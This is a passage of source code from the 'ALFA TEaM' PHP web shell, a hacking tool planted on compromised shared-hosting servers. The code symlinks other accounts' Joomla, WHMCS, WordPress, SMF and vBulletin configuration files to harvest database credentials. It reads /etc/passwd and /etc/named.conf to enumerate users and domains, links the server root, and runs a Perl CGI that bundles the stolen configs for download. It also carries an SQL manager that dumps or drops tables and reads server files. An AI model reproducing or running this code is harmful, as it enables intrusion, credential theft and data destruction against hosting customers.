- symlink(\'/home/\'.$user.\'/public_html/configuration.php\',$kola.\'-joomla.txt\');
- symlink(\'/home/\'.$user.\'/public_html/submitticket.php\',$kola.\'-whmcs2.txt\');
- symlink(\'/home/\'.$user.\'/public_html/clients/configuration.php\',$kola.\'-clients.txt\');
- symlink(\'/home/\'.$user.\'/public_html/client/configuration.php\',$kola.\'-client.txt\');
- symlink(\'/home/\'.$user.\'/public_html/clientes/configuration.php\',$kola.\'-clientes.txt\');
- symlink(\'/home/\'.$user.\'/public_html/cliente/configuration.php\',$kola.\'-client.txt\');
- symlink(\'/home/\'.$user.\'/public_html/clientsupport/configuration.php\',$kola.\'-clientsupport.txt\');
- symlink(\'/home/\'.$user.\'/public_html/billing/configuration.php\',$kola.\'-billing.txt\');
- symlink(\'/home/\'.$user.\'/public_html/manage/configuration.php\',$kola.\'-whm-manage.txt\');
- symlink(\'/home/\'.$user.\'/public_html/my/configuration.php\',$kola.\'-whm-my.txt\');
- symlink(\'/home/\'.$user.\'/public_html/myshop/configuration.php\',$kola.\'-whm-myshop.txt\');
- symlink(\'/home/\'.$user.\'/public_html/includes/dist-configure.php\',$kola.\'-zencart.txt\');
- symlink(\'/home/\'.$user.\'/public_html/zencart/includes/dist-configure.php\',$kola.\'-shop-zencart.txt\');
- symlink(\'/home/\'.$user.\'/public_html/shop/includes/dist-configure.php\',$kola.\'-shop-ZCshop.txt\');
- symlink(\'/home/\'.$user.\'/public_html/Settings.php\',$kola.\'-smf.txt\');
- symlink(\'/home/\'.$user.\'/public_html/smf/Settings.php\',$kola.\'-smf2.txt\');
- symlink(\'/home/\'.$user.\'/public_html/forum/Settings.php\',$kola.\'-smf-forum.txt\');
- symlink(\'/home/\'.$user.\'/public_html/forums/Settings.php\',$kola.\'-smf-forums.txt\');
- symlink(\'/home/\'.$user.\'/public_html/upload/includes/config.php\',$kola.\'-up.txt\');
- symlink(\'/home/\'.$user.\'/public_html/up/includes/config.php\',$kola.\'-up2.txt\');
- }if ($ENV{\'REQUEST_METHOD\'} eq \'POST\') {read(STDIN, $buffer, $ENV{\'CONTENT_LENGTH\'});
- } else {$buffer = $ENV{\'QUERY_STRING\'};
- }@pairs = split(/&/, $buffer);
- foreach $pair (@pairs) {($name, $value) = split(/=/, $pair);
- $name =~ tr/+/ /;
- $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- $value =~ tr/+/ /;
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- $FORM{$name} = $value;
- }if ($FORM{pass} eq ""){print \'<body class="solevisible" bgcolor="#000000"><p>Solevisible[ALFA TEaM] Config Fucker</p><p>solevisible[at]gmail.com</p><span><font color="red">note:</font> enter passwd=> <font color="#FFFFFF">cat /etc/passwd</font></span><br /><br /><form method="post"><strong><textarea id="checkouttextarea" name="pass" style="border:3px dotted #FF0000;
- width: 498px;
- height: 370px;
- background-color:#FFFFFF;
- font-family:Tahoma;
- font-size:9pt;
- color: black" ></textarea><br />
- <p><input name="tar" type="text" style="border:3px dotted #FF0000;
- width: 212px;
- background-color:#FFFFFF;
- font-family:Tahoma;
- font-size:8pt;
- color:black;
- " /><br />
- </p><p><input name="Submit1" type="submit" value="Config Get" style="border:3px dotted #FF0000;
- width: 99;
- font-family:Tahoma;
- font-size:10pt;
- color: black;
- text-transform:uppercase;
- height:23;
- background-color:#FFFFFF;
- " /></p></form></strong>\';
- }else{@lines =<$FORM{pass}>;
- $y = @lines;
- open (MYFILE, ">tar.tmp");
- print MYFILE "tar -czf ".$FORM{tar}.".tar ";
- for ($ka=0;
- $ka<$y;
- $ka++){while(@lines[$ka] =~ m/(.*?):x:/g){&lil($1);
- print MYFILE $1.".txt ";
- for($kd=1;
- $kd<18;
- $kd++){print MYFILE $1.$kd.".txt ";
- }}}print\'<body class="solevisible" bgcolor="#000000"><h2>completed :)</h2><p>
- </p>\';
- if($FORM{tar} ne ""){open(INFO, "tar.tmp");
- @lines =<INFO> ;
- close(INFO);
- system(@lines);
- print\'<p><a href="\'.$FORM{tar}.\'.tar"><font color="#00FF00"><span style="text-decoration: none">Click Here To Download Tar File</span></font></a></p>\';
- }}print "</body></html>";
- ';
- @__write_file('config.alfa',$solevisible3);
- @chmod('config.alfa',0755);
- echo __pre();
- echo AlfaiFrameCreator('cgialfa/config.alfa');
- } if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){ if(function_exists('symlink')){ AlfaNum(9,10);
- echo __pre().'
- <center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);
- return false;
- " method="post">
- <input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
- <input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
- <p><input type="submit" value=" " name="symlink" /></p></form></center>';
- @mkdir('sym',0777);
- alfacgihtaccess('sym','sym/');
- $solevisible56 = $_POST['alfa5'];
- $solevisible57 = $_POST['alfa6'];
- $solevisible58 = $_POST['alfa7'];
- if($solevisible58){ @symlink("$solevisible56","sym/$solevisible57");
- echo __pre();
- echo '<center><b><font color="white">Click >> </font><a target="_blank" href="sym/'.$solevisible57.'" ><b><font size="4">'.$solevisible57.'</font></b></a></b></center>';
- } }else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
- } } if(isset($_POST['alfa1']) && $_POST['alfa1']=='website'){ if(!@file_exists("/etc/virtual/domainowners")){ echo "<center>";
- $d0mains = @file("/etc/named.conf");
- if(!$d0mains){ echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></pre></center>";
- } echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table align='center' width='40%' class='main' border='1'><td><font color=\"#00A220\"><b><center># Count</center></font></b></td><td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td><td><font color=\"#FF0000\"><b><center>Users</center></font></b></td>";
- $count=1;
- if($d0mains){ foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if(strlen(trim($domains[1][0])) > 2){ $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
- echo "<tr><td><b><font color=\"#00A220\">".$count."</b></font></td><td><a href=http://www.".$domains[1][0]."/><font color=\"#FFFFFF\"><b>".$domains[1][0]."</font></b></a></td><td><b><font color=\"#FF0000\">".$user['name']."</font></b></td></tr>";
- flush();
- $count++;
- }}}} echo "</center></table>";
- }else{echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b> ';
- } } if(isset($_POST['alfa2']) && $_POST['alfa2']=='whole'){ if(!@file_exists("/etc/virtual/domainowners")){ @set_time_limit(0);
- echo "<center>";
- if(function_exists('symlink')){ @mkdir('sym',0777);
- alfacgihtaccess('sym','sym/');
- @symlink('/','sym/root');
- $solevisible9 = @file('/etc/named.conf');
- if(!$solevisible9){ echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></pre></center>";
- }else{ echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>";
- echo "<table align='center' width='40%' class='main' border='1'>
- <td><font color=\"#FFFF01\"><b><center># Count</center></font></b></td>
- <td><font color=\"#00A220\"><b><center>Domains</center></font></b></td>
- <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
- <td><font color=\"#FF0000\"><b><center>symlink</center></font></b></td>";
- $count=1;
- foreach($solevisible9 as $solevisible13){ if(@eregi('zone',$solevisible13)){ preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
- flush();
- if(strlen(trim($solevisible14[1][0])) >2){ $solevisible18 = @posix_getpwuid(@fileowner('/etc/valiases/'.$solevisible14[1][0]));
- $solevisible21 = $solevisible18['name'];
- @symlink('/','sym/root');
- $solevisible21 = $solevisible14[1][0];
- $solevisible20 = '\.ir';
- $solevisible19 = '\.il';
- if (@eregi("$solevisible20",$solevisible14[1][0]) or @eregi("$solevisible19",$solevisible14[1][0]) ){ $solevisible21 = "<b><font color=\"#00FFFF\">".$solevisible14[1][0].'</font></b>';
- } echo "<tr><td><font color=\"#FFFF01\">{$count}</font></td><td><a target='_blank' href=http://www.".$solevisible14[1][0].'/><font color=\"#00A220\"><b>'.$solevisible21.'</b> </a></font></td><td><font color="white"><b>'.$solevisible18['name']."</font></b></td><td><a href='sym/root/home/".$solevisible18['name']."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";
- flush();
- $count++;
- }}}} }else{ echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
- } }else {echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b> ';
- } echo "</center></table>";
- } if(isset($_POST['alfa6']) && $_POST['alfa6']=='direct'){ if(@file_exists("/etc/virtual/domainowners")){ if(function_exists('sysmlink')){ @mkdir('sym',0777);
- alfacgihtaccess('sym','sym/');
- @symlink('/','sym/root');
- fclose($solevisible10);
- $sole = @file("/etc/virtual/domainowners");
- $count=1;
- echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>";
- echo "<table align='center' width='40%' class='main' border='1'>
- <td><font color=\"#FFFF01\"><b><center># Count</center></font></b></td>
- <td><font color=\"#00A220\"><b><center>Domains</center></font></b></td>
- <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
- <td><font color=\"#FF0000\"><b><center>symlink</center></font></b></td>";
- foreach($sole as $visible){ if(@eregi(":",$visible)){ $solevisible = explode(':', $visible);
- echo "<tr><td><font color=\"#FFFF01\">{$count}</font></td><td><a target='_blank' href=http://www.".trim($solevisible[0]).'/><font color=\"#00A220\"><b>'.trim($solevisible[0]).'</b> </font></a></td><td><font color="white"><b>'.trim($solevisible[1])."</font></b></td><td><a href='sym/root/home/".trim($solevisible[1])."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";
- flush();
- $count++;
- }}echo "</table>";
- }else{ echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
- } }else{echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
- }} if(isset($_POST['alfa3']) && $_POST['alfa3']=='config'){ echo "<center>";
- if(function_exists('symlink')){ @mkdir('sym',0777);
- alfacgihtaccess('sym','sym/');
- @symlink('/','sym/root');
- $solevisible9 = @file('/etc/named.conf');
- if(!$solevisible9) { echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Cant access this file on server -> [ /etc/named.conf ]</b></font></pre></center>";
- } else { echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br>
- <table align='center' width='40%' class='main' ><td><b><font color=\"#FFFFFF\"><center> Domains <b></font></center></td><td> <b><font color=\"#FFFFFF\">Script <b></font></center></td>";
- foreach($solevisible9 as $solevisible13){ if(@eregi('zone',$solevisible13)){ preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
- flush();
- if(strlen(trim($solevisible14[1][0]))>2){ $solevisible18 = @posix_getpwuid(@fileowner('/etc/valiases/'.$solevisible14[1][0]));
- $solevisible15=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/wp-config.php';
- $solevisible33=get_headers($solevisible15);
- $solevisible17=$solevisible33[0];
- $solevisible34=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/blog/wp-config.php';
- $solevisible35=get_headers($solevisible34);
- $solevisible36=$solevisible35[0];
- $solevisible37=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/configuration.php';
- $solevisible38=get_headers($solevisible37);
- $solevisible28=$solevisible38[0];
- $solevisible29=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/joomla/configuration.php';
- $solevisible30=get_headers($solevisible29);
- $solevisible27=$solevisible30[0];
- $solevisible31=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/includes/config.php';
- $solevisible32=get_headers($solevisible31);
- $solevisible26=$solevisible32[0];
- $solevisible25=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/vb/includes/config.php';
- $solevisible39=get_headers($solevisible25);
- $solevisible40=$solevisible39[0];
- $solevisible24=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/forum/includes/config.php';
- $solevisible23=get_headers($solevisible24);
- $solevisible22=$solevisible23[0];
- $solevisible41=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'public_html/clients/configuration.php';
- $solevisible42=get_headers($solevisible41);
- $solevisible43=$solevisible42[0];
- $solevisible44=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/support/configuration.php';
- $solevisible42=get_headers($solevisible44);
- $solevisible45=$solevisible42[0];
- $solevisible46=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/client/configuration.php';
- $solevisible47=get_headers($solevisible46);
- $solevisible48=$solevisible47[0];
- $solevisible49=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/submitticket.php';
- $solevisible50=get_headers($solevisible49);
- $solevisible51=$solevisible50[0];
- $solevisible52=$solevisible8.'/sym/root/home/'.$solevisible18['name'].'/public_html/client/configuration.php';
- $solevisible53=get_headers($solevisible52);
- $solevisible54=$solevisible53[0];
- $solevisible54 = strpos($solevisible17,'200');
- $solevisible16='
- ';
- if (strpos($solevisible17,'200') == true ) { $solevisible16="<a href='".$solevisible15."' target='_blank'>Wordpress</a>";
- } elseif (strpos($solevisible36,'200') == true) { $solevisible16="<a href='".$solevisible34."' target='_blank'>Wordpress</a>";
- } elseif (strpos($solevisible28,'200') == true and strpos($solevisible51,'200') == true ) { $solevisible16=" <a href='".$solevisible49."' target='_blank'>WHMCS</a>";
- } elseif (strpos($solevisible45,'200') == true) { $solevisible16 =" <a href='".$solevisible44."' target='_blank'>WHMCS</a>";
- } elseif (strpos($solevisible48,'200') == true) { $solevisible16 =" <a href='".$solevisible46."' target='_blank'>WHMCS</a>";
- } elseif (strpos($solevisible28,'200') == true) { $solevisible16=" <a href='".$solevisible37."' target='_blank'>Joomla</a>";
- } elseif (strpos($solevisible27,'200') == true) { $solevisible16=" <a href='".$solevisible29."' target='_blank'>Joomla</a>";
- } elseif (strpos($solevisible26,'200') == true) { $solevisible16=" <a href='".$solevisible31."' target='_blank'>vBulletin</a>";
- } elseif (strpos($solevisible40,'200') == true) { $solevisible16=" <a href='".$solevisible25."' target='_blank'>vBulletin</a>";
- } elseif (strpos($solevisible22,'200') == true) { $solevisible16=" <a href='".$solevisible24."' target='_blank'>vBulletin</a>";
- } else { continue;
- } $solevisible21 = $solevisible18['name'] ;
- echo '<tr><td><a href=http://www.'.$solevisible14[1][0].'/>'.$solevisible14[1][0].'</a></td>
- <td>'.$solevisible16.'</td></tr>';
- flush();
- } } } } echo "</center></table>";
- }else{echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
- } } echo "</div>";
- alfafooter();
- } function alfasql(){ class DbClass{ var $type;
- var $link;
- var $res;
- function DbClass($type) { $this->type = $type;
- } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
- break;
- case 'pgsql': $host = explode(':', $host);
- if(!$host[1]) $host[1]=5432;
- if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
- break;
- } return false;
- } function selectdb($db){ switch($this->type){ case 'mysql': if(@mysqli_select_db($db))return true;
- break;
- } return false;
- } function query($str){ switch($this->type){ case 'mysql': return $this->res = @mysqli_query($this->link,$str);
- break;
- case 'pgsql': return $this->res = @pg_query($this->link,$str);
- break;
- } return false;
- } function fetch(){ $res = func_num_args()?func_get_arg(0):$this->res;
- switch($this->type){ case 'mysql': return @mysqli_fetch_assoc($res);
- break;
- case 'pgsql': return @pg_fetch_assoc($res);
- break;
- } return false;
- } function listDbs(){ switch($this->type){ case 'mysql': return $this->query("SHOW databases");
- break;
- case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
- break;
- } return false;
- } function listTables(){ switch($this->type){ case 'mysql': return $this->res = $this->query('SHOW TABLES');
- break;
- case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
- break;
- } return false;
- } function error(){ switch($this->type){ case 'mysql': return @mysqli_error($this->link);
- break;
- case 'pgsql': return @pg_last_error();
- break;
- } return false;
- } function setCharset($str){ switch($this->type){ case 'mysql': if(function_exists('mysql_set_charset')) return @mysqli_set_charset($this->link,$str);
- else $this->query('SET CHARSET '.$str);
- break;
- case 'pgsql': return @pg_set_client_encoding($this->link, $str);
- break;
- } return false;
- } function loadFile($str){ switch($this->type){ case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
- break;
- case 'pgsql': $this->query("CREATE TABLE solevisible(file text);
- COPY solevisible FROM '".addslashes($str)."';
- select file from solevisible;
- ");
- $r=array();
- while($i=$this->fetch()) $r[] = $i['file'];
- $this->query('drop table solevisible');
- return array('file'=>implode("\n",$r));
- break;
- } return false;
- } function dump($table, $fp = false){ switch($this->type){ case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
- $create = mysqli_fetch_array($res);
- $sql = $create[1].";
- \n";
- if($fp) fwrite($fp, $sql);
- else echo($sql);
- $this->query('SELECT * FROM `'.$table.'`');
- $head = true;
- while($item = $this->fetch()){ $columns = array();
- foreach($item as $k=>$v) { if($v == null) $item[$k] = "NULL";
- elseif(is_numeric($v)) $item[$k] = $v;
- else $item[$k] = "'".@mysqli_real_escape_string($v)."'";
- $columns[] = "`".$k."`";
- } if($head) { $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
- $head = false;
- } else $sql = "\n\t,(".implode(", ", $item).')';
- if($fp) fwrite($fp, $sql);
- else echo($sql);
- } if(!$head) if($fp) fwrite($fp, ";
- \n\n");
- else echo(";
- \n\n");
- break;
- case 'pgsql': $this->query('SELECT * FROM '.$table);
- while($item = $this->fetch()) { $columns = array();
- foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'";
- $columns[] = $k;
- } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');
- '."\n";
- if($fp) fwrite($fp, $sql);
- else echo($sql);
- } break;
- } return false;
- } };
- $db = new DbClass($_POST['type']);
- if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){ $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
- $db->selectdb($_POST['sql_base']);
- switch($_POST['charset']){ case "Windows-1251": $db->setCharset('calfa1251');
- break;
- case "UTF-8": $db->setCharset('utf8');
- break;
- case "KOI8-R": $db->setCharset('koi8r');
- break;
- case "KOI8-U": $db->setCharset('koi8u');
- break;
- case "calfa866": $db->setCharset('calfa866');
- break;
- } $json = json_decode($_POST['alfa2'],true);
- if(count($json['tbl'])>0){ if($_POST['alfa1']=='dumpfile'){ if($fp = @fopen($json['file'],'w')){ foreach($json['tbl'] as $v)$db->dump($v, $fp);
- fclose($fp);
- $dumpStatus = true;
- }}else{ foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
- } } unset($_POST['alfa2']);
- } alfahead();
- echo "
- <div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
- <form name='sf' method='post' onsubmit='fs(this);
- return false;
- '><table cellpadding='2' cellspacing='0'><tr>
- <td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
- <input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
- <td><select name='type'><option value='mysql' ";
- if(@$_POST['type']=='mysql')echo 'selected';
- echo ">MySql</option><option value='pgsql' ";
- if(@$_POST['type']=='pgsql')echo 'selected';
- echo ">PostgreSql</option></select></td>
- <td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
- <td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
- <td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
- $tmp = "<input type='text' name='sql_base' id='db_name' value=''>";
- if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']){ case "Windows-1251": $db->setCharset('calfa1251');
- break;
- case "UTF-8": $db->setCharset('utf8');
- break;
- case "KOI8-R": $db->setCharset('koi8r');
- break;
- case "KOI8-U": $db->setCharset('koi8u');
- break;
- case "calfa866": $db->setCharset('calfa866');
- break;
- } $db->setCharset('utf8');
- $db->listDbs();
- echo "<select name=sql_base><option value=''></option>";
- while($item = $db->fetch()) { list($key, $value) = each($item);
- echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
- } echo '</select>';
- } else echo $tmp;
- }else echo $tmp;
- echo "</td>
- <td><input type='submit' value=' '></td>
- <td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
- </tr>
- </table>
- <script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';
- mysql_cache['user']='".addslashes($_POST['sql_login'])."';
- mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';
- mysql_cache['db']='".addslashes($_POST['sql_base'])."';
- mysql_cache['charset']='".addslashes($_POST['charset'])."';
- mysql_cache['type']='".addslashes($_POST['type'])."';
- mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
- ";
- if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
- if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']);
- echo "<tr><td width=1 style='border-top:2px solid #666;
- '><div class='txtfont'>Tables:</div><br><br>";
- $tbls_res = $db->listTables();
- while($item = $db->fetch($tbls_res)){ list($key, $value) = each($item);
- if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
- $value = htmlspecialchars($value);
- echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>
- <a href='javascript:void(0);
- ' onclick=\"fs('0','".$value."')\">".$value."</a>" . (empty($_POST['sql_count'])?'
- ':" <small>({$n['n']})</small>") . "</nobr><br>";
- } echo "<p><input type='checkbox' onclick='is();
- '> <input type='button' value=' Dump ' onclick=\"fs('4');
- \" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');
- \" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'Success...!':'')."</td><td style='border-top:2px solid #666;
- '>";
- if(@$_POST['alfa1'] == 'select'){ $_POST['alfa1'] = 'query';
- $_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
- $db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
- $num = $db->fetch();
- $pages = ceil($num['n'] / 30);
- echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
- echo " of $pages";
- if($_POST['alfa3'] > 1) echo " <a href='javascript:void(0);
- ' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')><
- Prev</a>";
- if($_POST['alfa3'] < $pages) echo " <a href='javascript:void(0);
- ' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next >
- </a>";
- $_POST['alfa3']--;
- $cache_table = $_POST['alfa2'];
- if($_POST['type']=='pgsql') $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
- else $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
- echo "<br><br>";
- } if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) { $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
- $db->query(@$_POST['alfa2']);
- if($db->res !== false){ $title = false;
- echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
- $line = 1;
- while($item = $db->fetch()) { if(!$title){ echo '<tr><th>#</th>';
- foreach($item as $key => $value){ echo '<th>'.$key.'</th>';
- } reset($item);
- $title=true;
- echo '</tr><tr>';
- $line = 2;
- } if($cache_table!=''){ $cacheMsg = '<a href="javascript:void(0);
- " onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
- }else{ $cacheMsg ='-';
- } echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
- $line = $line==1?2:1;
- foreach($item as $key => $value){ if($value == null) echo '<td><i>null</i></td>';
- else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
- } echo '</tr>';
- } echo '</table>';
- } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
- } } echo('</form>');
- if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){ $data = explode(':',$_POST['alfa3']);
- echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
- echo("<form onsubmit='fsu(this);
- return false;
- '><table border='1'>");
- if($data[1] != '0'){ $data[2] = __ZGVjb2Rlcg($data[2]);
- $data[2] = str_replace('"','',$data[2]);
- $fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
- $fetch['__ALFAKEY'] = $data[1];
- $fetch['__ALFAKEYVAL'] = $data[2];
- }else{ $d = __ZGVjb2Rlcg($data[2]);
- $fetch = json_decode($d, true);
- } foreach($fetch as $key => $value){ if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
- $value = htmlspecialchars($value);
- echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
- } echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
- } if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){ $data = json_decode($_POST['alfa2'], true);
- $alfadata = $data['__ALFADATA'];
- $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
- $keyval = array();
- echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
- echo("<form onsubmit='fsu(this);
- return false;
- '><table border='1'>");
- $set = '';
- foreach($data as $key => $value){ if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
- if($data2['__ALFAKEY']==$key){ $keyval['__ALFAKEY'] = $key;
- $keyval['__ALFAKEYVAL'] = $value;
- } $set .= "`$key` = '".addslashes($value)."',";
- $value = htmlspecialchars($value);
- echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
- } unset($data['__ALFADATA']);
- echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
- if(!isset($data2['__ALFAKEY'])){ $where = '';
- foreach($data2 as $key => $value){ if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
- $value = addslashes($value);
- $where .= "`$key` = '$value' AND ";
- } $where = substr($where, 0, -4);
- }else{ $where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
- } $set = substr($set, 0, -1);
- $db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
- if($db->error()) echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
- else echo("Success...!");
- } if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){ echo "<p>Query:</p><form onsubmit='fs(this);
- return false;
- '>
- <input type='hidden' name='alfa1' value='query'/>
- <textarea name='query' style='width:100%;
- height:100px'>";
